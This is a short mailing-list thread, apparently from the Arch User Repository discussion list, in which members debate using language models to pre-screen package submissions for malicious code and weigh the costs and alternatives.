Greetings, I believe it has to be a language model as those would be the only ones capable of the reasoning needed to trace more complex code paths.
We should test out some open-weight ones to see how they would fare against malicious vs innocent AUR packages and calculate what the costs of hosting them would be. Best regards, -- Borna Punda -------- Original Message -------- From: [email protected] Sent: 29 May 2026 09:56:53 GMT+02:00 To: Shyamin Ayesh <[email protected]> Cc: "Discussion about the Arch User Repository (AUR)" <[email protected]> Subject: Re: [Idea] AUR vetting process using LLM models Pretty good idea you got there, however there's a legitimate concern on where and how you are going to be running it. For instance, which model to use? Gemini? Deepseek? Open-sourced ChatGPT? Secondly, where are we gonna get the money for that? Donations are enough for everything up to this point, but running an LLM will shoot costs through the roof. I suggest either distilling or training a separate algorithm (**NOT** a language model) to keep costs low, as it won't be a generalist and we won't be wasting RAM on storing parameters about medicine in a software project. -------- Original Message -------- On Friday, 05/29/26 at 11:23 Shyamin Ayesh <[email protected]> wrote: > Hello Everyone, > > I know this is going to be a controversial idea, and I'm not much of a > writer, so bear with me here. > > I've been noticing the recent wave of spam packages and malicious code > submissions hitting the AUR lately. It's getting worse, and the current > manual review process clearly doesn't scale. > > So here's my possibly unpopular suggestion: what if we used LLMs as a > first-pass filter for AUR submissions? > > The basic idea: > - When a PKGBUILD or install script gets submitted, an LLM scans it for > sketchy stuff like obfuscated code, curl pipes to random endpoints, crypto > miners, encoded payloads, that kind of thing. > - It doesn't replace human review. It just flags the suspicious ones so > reviewers know where to look first. > - Unlike regex-based scanners, LLMs can actually understand code intent. They > can catch things like subtle dependency hijacking or weird post-install > behavior that static tools would miss. > - Flagged packages go into a queue with the LLM's reasoning attached, not > just "blocked" but why it thinks something is off. > I get it, there are real concerns. False positives, inference costs, and > honestly just the idea of putting AI anywhere near the trust pipeline. But > I'm not saying replace anything. Just add a layer. Could be a server-side > hook on submission, or a community bot that comments on new packages. I'm > happy to help build a prototype if anyone's interested. > > I know some of you are going to hate this idea, and that's fine. But the spam > problem is real and getting worse, so I figured it's worth putting out there. > Open to better ideas too. > Cheers, > Shyamin
